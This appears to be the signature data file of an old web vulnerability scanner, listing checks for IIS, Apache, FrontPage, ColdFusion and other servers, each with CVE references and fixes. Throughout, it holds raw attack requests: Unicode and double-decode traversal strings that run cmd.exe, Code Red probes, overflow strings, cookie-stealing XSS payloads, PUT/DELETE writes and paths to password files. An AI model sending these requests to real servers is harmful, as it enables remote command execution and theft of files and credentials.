2.07 0 80 1 0 16 1 Vulnerabilities in earlier versions of Apache. / Apache 1.3.26 CAN-2002-0839 http://online.securityfocus.com/bid/5033 / thttpd 2.22 http://online.securityfocus.com/bid/3562 Open Proxy allows one to gain access to some pages protected by DNS lookups or IP limited access. http://www.unspecific.com/proxy.test b1d92fbafd2ecf3298ea34d341917bf6a66f830874b0645433834ea262b594bf Proxy Turn off Proxy or restrict to specific addresses x.ida?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=X Error0xc0000005caught Microsoft-IIS http://www.microsoft.com/technet/security/bulletin/MS01-033.asp PATCH with MS01-003 CVE-2001-0500 Many of the sample files shipped with Microsoft Internet Information Server (IIS) and SiteServer can be remotely exploited to read arbitrary files on vulnerable servers. Sites/Knowledge/Membership/Inspired/ViewCode.asp Microsoft-IIS Delete the file Sites/Knowledge/Membership/Inspired/ViewCode.asp http://www.atstake.com/research/advisories/1999/showcode.txt CAN-1999-0736 Many of the sample files shipped with Microsoft Internet Information Server (IIS) and SiteServer can be remotely exploited to read arbitrary files on vulnerable servers. Sites/Knowledge/Membership/Inspiredtutorial/Viewcode.asp Microsoft-IIS Delete the files http://www.atstake.com/research/advisories/1999/showcode.txt CAN-1999-0736 Many of the sample files shipped with Microsoft Internet Information Server (IIS) and SiteServer can be remotely exploited to read arbitrary files on vulnerable servers. Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp Microsoft-IIS Delete the files http://www.atstake.com/research/advisories/1999/showcode.txt CAN-1999-0736 Many of the sample files shipped with Microsoft Internet Information Server (IIS) and SiteServer can be remotely exploited to read arbitrary files on vulnerable servers. Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp Microsoft-IIS Delete the files http://www.atstake.com/research/advisories/1999/showcode.txt CAN-1999-0736 Many of the sample files shipped with Microsoft Internet Information Server (IIS) and SiteServer can be remotely exploited to read arbitrary files on vulnerable servers. Sites/Samples/Knowledge/Push/ViewCode.asp Microsoft-IIS Delete the files http://www.atstake.com/research/advisories/1999/showcode.txt CAN-1999-0736 Many of the sample files shipped with Microsoft Internet Information Server (IIS) and SiteServer can be remotely exploited to read arbitrary files on vulnerable servers. Sites/Samples/Knowledge/Search/ViewCode.asp Microsoft-IIS Delete the files http://www.atstake.com/research/advisories/1999/showcode.txt CAN-1999-0736 Many of the sample files shipped with Microsoft Internet Information Server (IIS) and SiteServer can be remotely exploited to read arbitrary files on vulnerable servers. SiteServer/Publishing/viewcode.asp Microsoft-IIS Delete the files http://www.atstake.com/research/advisories/1999/showcode.txt CAN-1999-0736 Many of the sample files shipped with Microsoft Internet Information Server (IIS) and SiteServer can be remotely exploited to read arbitrary files on vulnerable servers. iissamples/exair/howitworks/Codebrws.asp Microsoft-IIS Remove IISSAMPLES from IIS Admin MMC http://www.atstake.com/research/advisories/1999/showcode.txt CAN-1999-0736 Mail/smtp/Admin/smadv.asp Microsoft-IIS Remove mapping for Mail/SMTP/Admin Many of the sample files shipped with Microsoft Internet Information Server (IIS) and SiteServer can be remotely exploited to read arbitrary files on vulnerable servers. iissamples/exair/howitworks/Code.asp Microsoft-IIS http://www.atstake.com/research/advisories/1999/showcode.txt Remove IISSAMPLES from IIS Admin MMC CAN-1999-0736 Many of the sample files shipped with Microsoft Internet Information Server (IIS) and SiteServer can be remotely exploited to read arbitrary files on vulnerable servers. iissamples/exair/howitworks/Codebrw1.asp Microsoft-IIS http://www.atstake.com/research/advisories/1999/showcode.txt Remove IISSAMPLES from IIS Admin MMC CAN-1999-0736 Many of the sample files shipped with Microsoft Internet Information Server (IIS) and SiteServer can be remotely exploited to read arbitrary files on vulnerable servers. iissamples/sdk/asp/docs/codebrws.asp Microsoft-IIS http://www.atstake.com/research/advisories/1999/showcode.txt Remove IISSAMPLES from IIS Admin MMC CAN-1999-0736 Many of the sample files shipped with Microsoft Internet Information Server (IIS) and SiteServer can be remotely exploited to read arbitrary files on vulnerable servers. iissamples/sdk/asp/docs/CodeBrws.asp Microsoft-IIS http://www.atstake.com/research/advisories/1999/showcode.txt Remove IISSAMPLES from IIS Admin MMC CAN-1999-0736 Many of the sample files shipped with Microsoft Internet Information Server (IIS) and SiteServer can be remotely exploited to read arbitrary files on vulnerable servers. iissamples/sdk/asp/docs/codebrw2.asp Microsoft-IIS http://www.atstake.com/research/advisories/1999/showcode.txt Remove IISSAMPLES from IIS Admin MMC CAN-1999-0736 Many of the sample files shipped with Microsoft Internet Information Server (IIS) and SiteServer can be remotely exploited to read arbitrary files on vulnerable servers. msadc/Samples/selector/showcode.asp View ASP Source Microsoft-IIS http://www.atstake.com/research/advisories/1999/showcode.txt Remove MSADC from IIS Admin MMC CAN-1999-0736 f3f70064a5716c93be7c7abeba8af58b msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetMachineName Microsoft-IIS POST Remove MSADC from IIS Admin MMC CVE-1999-1011 http://online.securityfocus.com/bid/529 application/x-varg HIGH The DELETE method requests that the origin server delete the resource identified by the Request-URI. This method MAY be overridden by human intervention (or other means) on the origin server. HACKED.txt DELETE http://www.w3c.org/Protocols/rfc2616/rfc2616-sec9.html Disable off DELETE in the options of the web server The PUT method can be used to allow people to upload content to a web server via the HTTP protocol directly. If it is misconfigured it can also allow anyone to upload any contact, or even over-write content and should be used with GREAT CAUTION. HACKED.txt PUT http://www.w3c.org/Protocols/rfc2616/rfc2616-sec9.html Disable PUT for all directories in the web server, this may mean disabling WRITE permissions on the web server The "Code Red" worm is self-replicating malicious code that exploits a known vulnerability in Microsoft IIS servers msdac/root.exe?/c+dir Directory of Microsoft-IIS http://www.microsoft.com/technet/security/bulletin/MS00-078.asp REBUILD THE BOX HIGH CA-2001-19 The "Code Red" worm is self-replicating malicious code that exploits a known vulnerability in Microsoft IIS servers scripts/root.exe?/c+dir Directory of Microsoft-IIS HIGH http://www.microsoft.com/technet/security/bulletin/MS00-078.asp REBUILD THE BOX CA-2001-19 The Nimda worm has the potential to affect both user workstations (clients) running Windows 95, 98, ME, NT, or 2000 and servers running Windows NT and 2000. / readme.eml Microsoft-IIS audio HIGH http://www.sarc.com/avcenter/venc/data/w32.nimda.a@mm.html REBUILD THE BOX CA-2001-26 IS 4.0 and 5.0 allows remote attackers to read documents outside of the web root, and possibly execute arbitrary commands, via malformed URLs that contain UNICODE encoded characters, aka the "Web Server Folder Traversal" vulnerability. scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir+c:\\ Directory of Microsoft-IIS HIGH http://www.microsoft.com/technet/security/bulletin/MS00-078.asp PATCH CVE-2000-0884 IS 4.0 and 5.0 allows remote attackers to read documents outside of the web root, and possibly execute arbitrary commands, via malformed URLs that contain UNICODE encoded characters, aka the "Web Server Folder Traversal" vulnerability. scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\ Directory of Microsoft-IIS HIGH http://www.microsoft.com/technet/security/bulletin/MS00-078.asp PATCH CVE-2000-0884 IS 4.0 and 5.0 allows remote attackers to read documents outside of the web root, and possibly execute arbitrary commands, via malformed URLs that contain UNICODE encoded characters, aka the "Web Server Folder Traversal" vulnerability. scripts/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir Directory of Microsoft-IIS application HIGH http://www.microsoft.com/technet/security/bulletin/MS00-078.asp PATCH CVE-2000-0884 IS 4.0 and 5.0 allows remote attackers to read documents outside of the web root, and possibly execute arbitrary commands, via malformed URLs that contain UNICODE encoded characters, aka the "Web Server Folder Traversal" vulnerability. ..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir Directory of Microsoft-IIS HIGH http://www.microsoft.com/technet/security/bulletin/MS00-078.asp PATCH CVE-2000-0884 IS 4.0 and 5.0 allows remote attackers to read documents outside of the web root, and possibly execute arbitrary commands, via malformed URLs that contain UNICODE encoded characters, aka the "Web Server Folder Traversal" vulnerability. msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir Directory of Microsoft-IIS HIGH http://www.microsoft.com/technet/security/bulletin/MS00-078.asp PATCH CVE-2000-0884 IS 4.0 and 5.0 allows remote attackers to read documents outside of the web root, and possibly execute arbitrary commands, via malformed URLs that contain UNICODE encoded characters, aka the "Web Server Folder Traversal" vulnerability. _vti_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir Directory of Microsoft-IIS HIGH http://www.microsoft.com/technet/security/bulletin/MS00-078.asp PATCH CVE-2000-0884 IS 4.0 and 5.0 allows remote attackers to read documents outside of the web root, and possibly execute arbitrary commands, via malformed URLs that contain UNICODE encoded characters, aka the "Web Server Folder Traversal" vulnerability. _mem_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir Directory of Microsoft-IIS HIGH http://www.microsoft.com/technet/security/bulletin/MS00-078.asp PATCH - MS00-078 CVE-2000-0884 IS 4.0 and 5.0 allows remote attackers to read documents outside of the web root, and possibly execute arbitrary commands, via malformed URLs that contain UNICODE encoded characters, aka the "Web Server Folder Traversal" vulnerability. cfide/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir Directory of Microsoft-IIS HIGH http://www.microsoft.com/technet/security/bulletin/MS00-078.asp PATCH - MS00-078 CVE-2000-0884 AdvWorks/equipment/catalog_type.asp Microsoft-IIS Delete the AdvWorks sample directory ASPSamp/AdvWorks/equipment/catalog_type.asp Microsoft-IIS Delete ASPSamp sample directory can be used for brute force password attacks, or to identify valid users on the system, allows a remote attacker to cause a denial of service via a malformed request, AND allows local users to bypass the "User cannot change password" policy for Windows NT iisadmpwd/aexp4b.htr InternetServiceManager Microsoft-IIS http://www.securityfocus.com/cgi-bin/archive.pl?id=1&mid=8515 Remove IISADMPWD from the IIS Admin MMC CVE-1999-0407 can be used for brute force password attacks, or to identify valid users on the system, allows a remote attacker to cause a denial of service via a malformed request, AND allows local users to bypass the "User cannot change password" policy for Windows NT iisadmpwd/achg.htr Microsoft-IIS http://www.securityfocus.com/cgi-bin/archive.pl?id=1&mid=8515 Remove IISADMPWD from the IIS Admin MMC CVE-1999-0407 can be used for brute force password attacks, or to identify valid users on the system, allows a remote attacker to cause a denial of service via a malformed request, AND allows local users to bypass the "User cannot change password" policy for Windows NT iisadmpwd/aexp.htr Microsoft-IIS http://www.securityfocus.com/cgi-bin/archive.pl?id=1&mid=8515 Remove IISADMPWD from the IIS Admin MMC CVE-1999-0407 can be used for brute force password attacks, or to identify valid users on the system, allows a remote attacker to cause a denial of service via a malformed request, AND allows local users to bypass the "User cannot change password" policy for Windows NT iisadmpwd/aexp2.htr Microsoft-IIS http://www.securityfocus.com/cgi-bin/archive.pl?id=1&mid=8515 Remove IISADMPWD from the IIS Admin MMC CVE-1999-0407 can be used for brute force password attacks, or to identify valid users on the system, allows a remote attacker to cause a denial of service via a malformed request, AND allows local users to bypass the "User cannot change password" policy for Windows NT iisadmpwd/aexp2b.htr Microsoft-IIS http://www.securityfocus.com/cgi-bin/archive.pl?id=1&mid=8515 Remove IISADMPWD from the IIS Admin MMC CVE-1999-0407 can be used for brute force password attacks, or to identify valid users on the system, allows a remote attacker to cause a denial of service via a malformed request, AND allows local users to bypass the "User cannot change password" policy for Windows NT iisadmpwd/aexp3.htr Microsoft-IIS http://www.securityfocus.com/cgi-bin/archive.pl?id=1&mid=8515 Remove IISADMPWD from the IIS Admin MMC CVE-1999-0407 can be used for brute force password attacks, or to identify valid users on the system, allows a remote attacker to cause a denial of service via a malformed request, AND allows local users to bypass the "User cannot change password" policy for Windows NT iisadmpwd/aexp4.htr Microsoft-IIS http://www.securityfocus.com/cgi-bin/archive.pl?id=1&mid=8515 Remove IISADMPWD from the IIS Admin MMC CVE-1999-0407 can be used for brute force password attacks, or to identify valid users on the system, allows a remote attacker to cause a denial of service via a malformed request, AND allows local users to bypass the "User cannot change password" policy for Windows NT iisadmpwd/aexp4b.htr Microsoft-IIS http://www.securityfocus.com/cgi-bin/archive.pl?id=1&mid=8515 Remove IISADMPWD from the IIS Admin MMC CVE-1999-0407 can be used for brute force password attacks, or to identify valid users on the system, allows a remote attacker to cause a denial of service via a malformed request, AND allows local users to bypass the "User cannot change password" policy for Windows NT iisadmpwd/anot.htr Microsoft-IIS http://www.securityfocus.com/cgi-bin/archive.pl?id=1&mid=8515 Remove IISADMPWD from the IIS Admin MMC CVE-1999-0407 can be used for brute force password attacks, or to identify valid users on the system, allows a remote attacker to cause a denial of service via a malformed request, AND allows local users to bypass the "User cannot change password" policy for Windows NT iisadmpwd/anot3.htr Microsoft-IIS http://www.securityfocus.com/cgi-bin/archive.pl?id=1&mid=8515 Remove IISADMPWD from the IIS Admin MMC CVE-1999-0407 _AuthChangeUrl? Microsoft-IIS http://support.microsoft.com/support/kb/articles/Q282/0/62.ASP Remove IISADMPWD from the IIS Admin MMC _vti_pvt/administrator.pwd Microsoft-IIS _vti_pvt/users.pwd Microsoft-IIS _vti_pvt/administrators.pwd Microsoft-IIS _vti_pvt/service.pwd Microsoft-IIS _vti_pvt/authors.pwd Microsoft-IIS tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=goatfart+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2goatfart.html&newdb=CREATE_DB&attr= Microsoft-IIS/3 http://www.securityfocus.com/bid/1818 Remove newdsn.exe from the tools directory CVE-1999-0191 CFIDE/Administrator/startstop.html ColdFusion Delete the startstop.html scripts/fpcount.exe Microsoft-IIS http://www.securityfocus.com/bid/2252 47c31efa88b192c6c12fb0ef4f8cea2e scripts/tools/newdsn.exe Microsoft-IIS http://www.securityfocus.com/bid/1818 Remove newdsn.exe from the tools directory scripts/tools/getdrvs.exe Microsoft-IIS http://www.securityfocus.com/bid/1818 SiteServer/Admin Microsoft-IIS Sites/Publishing/Users/ Microsoft-IIS PUT http://www.wiretrip.net/rfp/p/doc.asp/i1/d69.htm clocktower Microsoft-IIS http://www.wiretrip.net/rfp/p/doc.asp/i1/d69.htm vc30 Microsoft-IIS http://www.wiretrip.net/rfp/p/doc.asp/i1/d69.htm mspress30 Microsoft-IIS http://www.wiretrip.net/rfp/p/doc.asp/i1/d69.htm market Microsoft-IIS page temporarily unavailable http://www.wiretrip.net/rfp/p/doc.asp/i1/d69.htm siteserver/publishing/viewcode.asp Microsoft-IIS http://www.wiretrip.net/rfp/p/doc.asp/i1/d69.htm domcfg.nsf/?open Document Not Found Lotus cgi-bin/htimage.exe?2,2 Microsoft-IIS cgi-bin/imagemap.exe?2,2 Microsoft-IIS 209cb3195363873875c6a95950e67bb4 _vti_pvt/shtml.exe Microsoft-IIS _vti_bin/_vti_aut/dvwssr.dll Microsoft-IIS http://www.wiretrip.net/rfp/p/doc.asp?id=45&iface=1 Uninstall FP or delete the file index.php PHP-Nuke http://www.securityfocus.com/cgi-bin/vulns.pl?section=keyword&keyword=PHP publisher Netscape Netscape Web Publisher Document Not Found http://www.kb.cert.org/vuls/id/191763 A vulnerability exists in iPlanet Web Server, Enterprise Edition and Netscape Enterprise Server in which a malformed Web Publisher command can crash the web server process. This vulnerability only affects Windows NT based servers. Disable web publishing or filter out the bad content (see i-Planet) null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full takesyoutothenexthit Microsoft-IIS http://www.microsoft.com/technet/security/bulletin/ms00-006.asp Patch It SiteServer/admin/findvserver.asp Microsoft-IIS http://www.wiretrip.net/rfp/p/doc.asp/i5/d69.htm Remove Pages LDAP_Anonymous LdapPassword_1 SiteServer/Admin/commerce/foundation/driver.asp Microsoft-IIS http://www.wiretrip.net/rfp/p/doc.asp/i5/d69.htm Remove Pages LDAP_Anonymous LdapPassword_1 SiteServer/Admin/commerce/foundation/DSN.asp Microsoft-IIS http://www.wiretrip.net/rfp/p/doc.asp/i5/d69.htm Remove Pages LDAP_Anonymous LdapPassword_1 Admin/knowledge/dsmgr/users/GroupManager.asp Microsoft-IIS http://www.wiretrip.net/rfp/p/doc.asp/i5/d69.htm Remove Pages LDAP_Anonymous LdapPassword_1 Admin/knowledge/dsmgr/users/UserManager.asp Microsoft-IIS http://www.wiretrip.net/rfp/p/doc.asp/i5/d69.htm Remove Pages LDAP_Anonymous LdapPassword_1 SiteServer/Admin/knowledge/dsmgr/default.asp Microsoft-IIS http://www.wiretrip.net/rfp/p/doc.asp/i5/d69.htm Remove Pages LDAP_Anonymous LdapPassword_1 _mem_bin/autoconfig.asp Microsoft-IIS http://www.wiretrip.net/rfp/p/doc.asp/i5/d69.htm Remove Pages LDAP_Anonymous LdapPassword_1 _mem_bin/formslogin.asp Microsoft-IIS http://www.wiretrip.net/rfp/p/doc.asp/i5/d69.htm Remove Pages LDAP_Anonymous LdapPassword_1 Sites/Publishing/Users/ Microsoft-IIS PUT http://www.wiretrip.net/rfp/p/doc.asp/i5/d69.htm Remove Pages LDAP_Anonymous LdapPassword_1 GET /unspecifically-not-here HTTP/1.0 escape\(urlresult\) Microsoft-IIS RAW http://www.microsoft.com/technet/security/bulletin/MS02-018.asp Install Rollup Patch from MS02-018 /_vti_bin/shtml.dll/asdfghjkl :\\ Microsoft-IIS http://online.securityfocus.com/bid/1174/discussion/ Remove FrontPage or File /_vti_bin/shtml.exe/qwertyuiop :\\ Microsoft-IIS http://online.securityfocus.com/bid/1174/discussion/ Remove FrontPage or File /_vti_bin/_vti_aut/fp30reg.dll Microsoft-IIS Delete file and/or uninstall FrontPage /c/winnt/system32/cmd.exe?/c+dir Directory of Microsoft-IIS HIGH Don't share C:\ / PHP 4.2.2 WEB-INF/web.xml web-app JRun HIGH http://www.foundstone.com/knowledge/randd-advisories-display.html?id=231 Follow the recommendations given in Allaire Security Bulletin ASB00-27, available at: http://www.allaire.com/security/ A severe security flaw exists with Allaire's JRun 3.0 allowing an attacker to access WEB-INF directories on the JRun 3.0 server. The WEB-INF directory tree contains web application classes, pre-compiled JSP files, server side libraries, session information and files such as web.xml and webapp.properties. /cgi-bin/a1stats/a1disp.cgi a1disp.cgi\? http://online.securityfocus.com/archive/1/183028/2001-05-05/2001-05-11/0 _vti_bin/fpcount.exe?Page=default.asp|Image=3 image Microsoft-IIS Uninstall MSFP, delete /_vti_bin/fpcount.exe and/or remove virtual mapping for _vti_bin Medium Webhits.dll is part of the Microsoft Index Server package distributed with Windows NT 4.0 and 2000. A problem with the package could allow remote users to gain access to source code of ASP docuements. qwertypoiu.htw QUERY_STRING Microsoft-IIS http://online.securityfocus.com/bid/2269 HIGH Remove mapping for .htw 86e74983ccd646afa427918c324492b1 _vti_bin/shtml.dll FrontPage Error Microsoft-IIS Uninstall MSFP, delete /_vti_bin/shtml.dll and/or remove virtual mapping for _vti_bin GET /qwertypoiu.printer HTTP/1.0 500 13 RAW Microsoft-IIS Remove mapping for .printer HIGH CVE-2001-0241 mod_ssl 2.8.10 Upgrade or Patch mod_ssl HIGH %3Cscript%3Ealert(document.cookie)%3C/script%3E <script>alert(document.cookie)</script> Medium text/html http://www.cert.org/advisories/CA-2000-02.html GET /_vti_bin/_vti_aut/fp30reg.dll?1234=X HTTP/1.0 501 RAW Microsoft-IIS Uninstall MSFP, delete /_vti_bin/fp30reg.dll and/or remove virtual mapping for _vti_bin CAN-2001-0341 %3Cscript%3Ealert(document.cookie)%3C/script%3E.shtml <script>alert(document.cookie)</script> Medium text/html http://www.guninski.com/iis50shtml.html Remove .shtml mapping, delete shtml.dll and patch GET /checkapache.html HTTP/1.0 Transfer-Encoding: chunked 999999999; a 0 NULL RAW Apache Update and/or Patch Apache CAN-2002-0839 http://online.securityfocus.com/bid/5033 It is possible to remotely restart all IIS related service using specially crafted request. It is also possible to force IIS to consume memory which it does not free. Possible Buffer Overflow RAW SEARCH / HTTP/1.1 Host: %HOST% Content-Type: text/xml Content-Length: 133 <?xml version="1.0"?> <g:searchrequest xmlns:g="DAV:"> <g:sql> Select "DAV:displayname" from scope() </g:sql> </g:searchrequest> HTTP/1.1 207 Microsoft-IIS http://www.guninski.com/iissearch.html Disable WebDav extensions It is possible to remotely restart all IIS related service using specially crafted request. It is also possible to force IIS to consume memory which it does not free. Possible Buffer Overflow RAW PROPFIND / HTTP/1.1 Host: %HOST% Content-Type: text/xml Content-Length: 110 <?xml version="1.0"?> <a:propfind xmlns:a="DAV:"> <a:prop> <a:displayname:/> </a:prop> </a:propfind> D:href http://www.guninski.com/iispropover.html Disable WebDav extensions and PROPFIND Microsoft-IIS unspecific.jsp%3Cscript%3Ealert(document.cookie)%3C/script%3E <script>alert(document.cookie)</script> Medium text/html http://www.cert.org/advisories/CA-2000-02.html -->%3Cscript%3Ealert(document.cookie)%3C/script%3E <script>alert(document.cookie)</script> Medium text/html http://www.cert.org/advisories/CA-2000-02.html /adsamples/config/site.csc Microsoft-IIS SiteServer/Knowledge/Default.asp?ctr="%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E <script>alert(document.cookie)</script> Microsoft-IIS Medium text/html http://online.securityfocus.com/bid/3999 /_mem_bin/formslogin.asp?"%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E <script>alert(document.cookie)</script> Medium Microsoft-IIS text/html http://online.securityfocus.com/bid/3999 Uninstall SiteServer or Delete problem files http://63.250.209.116/pls/simpledad/admin_/gateway.htm Gateway Configuration Menu These admin menus should only be accessable with username and password. /cgi-bin/printenv Medium QUERY_STRING text/plain Delete printenv /unspecific.htr Medium The requested file could not be found. Microsoft-IIS text/plain At least one remote vulnerability has been discovered for the .HTR filter. This is detailed in Microsoft Advisory MS02-018, and gives remote SYSTEM level access to the web server. It is recommended that even if you have patched this vulnerability that you unmap the .HTR extension, and any other unused ISAPI extensions if they are not required for the operation of your site. Unmap the .HTR extension IS 4.0 and 5.0 allows remote attackers to read documents outside of the web root, and possibly execute arbitrary commands, via malformed URLs that contain UNICODE encoded characters, aka the "Web Server Folder Traversal" vulnerability. iisadmpwd/..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\\ Directory of Microsoft-IIS HIGH http://www.microsoft.com/technet/security/bulletin/MS00-078.asp PATCH CVE-2000-0884 IS 4.0 and 5.0 allows remote attackers to read documents outside of the web root, and possibly execute arbitrary commands, via malformed URLs that contain UNICODE encoded characters, aka the "Web Server Folder Traversal" vulnerability. exchange/..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\\ Directory of Microsoft-IIS HIGH http://www.microsoft.com/technet/security/bulletin/MS00-078.asp PATCH CVE-2000-0884 IS 4.0 and 5.0 allows remote attackers to read documents outside of the web root, and possibly execute arbitrary commands, via malformed URLs that contain UNICODE encoded characters, aka the "Web Server Folder Traversal" vulnerability. adsamples/..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\\ Directory of Microsoft-IIS HIGH http://www.microsoft.com/technet/security/bulletin/MS00-078.asp PATCH CVE-2000-0884 IS 4.0 and 5.0 allows remote attackers to read documents outside of the web root, and possibly execute arbitrary commands, via malformed URLs that contain UNICODE encoded characters, aka the "Web Server Folder Traversal" vulnerability. _vti_cnf/..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\\ Directory of Microsoft-IIS HIGH http://www.microsoft.com/technet/security/bulletin/MS00-078.asp PATCH CVE-2000-0884 IS 4.0 and 5.0 allows remote attackers to read documents outside of the web root, and possibly execute arbitrary commands, via malformed URLs that contain UNICODE encoded characters, aka the "Web Server Folder Traversal" vulnerability. _mem_bin/..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\\ Directory of Microsoft-IIS HIGH http://www.microsoft.com/technet/security/bulletin/MS00-078.asp PATCH CVE-2000-0884 IS 4.0 and 5.0 allows remote attackers to read documents outside of the web root, and possibly execute arbitrary commands, via malformed URLs that contain UNICODE encoded characters, aka the "Web Server Folder Traversal" vulnerability. samples/..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\\ Directory of Microsoft-IIS HIGH http://www.microsoft.com/technet/security/bulletin/MS00-078.asp PATCH CVE-2000-0884 Vulnerabilities in earlier versions of Apache. RealServer 9.0.2.794 http://www.service.real.com/help/faq/security/bufferoverrun12192002.html Patch/Upgrade RAW CONNECT mail.unspecific.com:25 HTTP/1.0 200 Connection TRACE unspecific TRACE / message/http Server, Date, MS-Author-Via, Content-Length, Accept-Ranges, DASL, DAV, Public, Allow, Cache-Control OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH private Server, Date, MS-Author-Via, Content-Length, Accept-Ranges, DASL, DAV, Public, Allow, Cache-Control OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK private Server, Date, Public, Allow, Content-Length OPTIONS, TRACE, GET, HEAD, POST, PUT, DELETE OPTIONS, TRACE, GET, HEAD HTTP/1.1 401 Access Denied WWW-Authenticate, Content-Length, Content-Type NTLM HTTP/1.1 302 Found Date, Location, Connection, Content-Type Date, Content-Length, Allow, Connection GET, HEAD, OPTIONS, TRACE Date, Cache-Control, Pragma, Expires, Connection, Content-Type Date, Content-Length, Allow, Connection GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, PATCH, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, TRACE Date, Vary, Allow, Content-Length, Connection, Content-Type, Content-Language, Expires GET,HEAD,POST,OPTIONS,TRACE Allow, MIME-Version, Date, Server OPTIONS, GET, HEAD, PUT, DELETE, LOCK, UNLOCK 1.0 Server, Date, Content-type, Allow, Content-length, Connection HEAD, GET GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS GET, HEAD, POST, TRACE, OPTIONS CSeq, Date, Server, Public, RealChallenge1, StatsMask OPTIONS, DESCRIBE, ANNOUNCE, PLAY, SETUP, GET_PARAMETER, SET_PARAMETER, TEARDOWN HTTP/1.0 501 Not Implemented Date, Content-type, Expires HTTP/1.0 405 Method Not Allowed Allow Get, Post HTTP/1.0 501 Not Implemented Server, Content-Type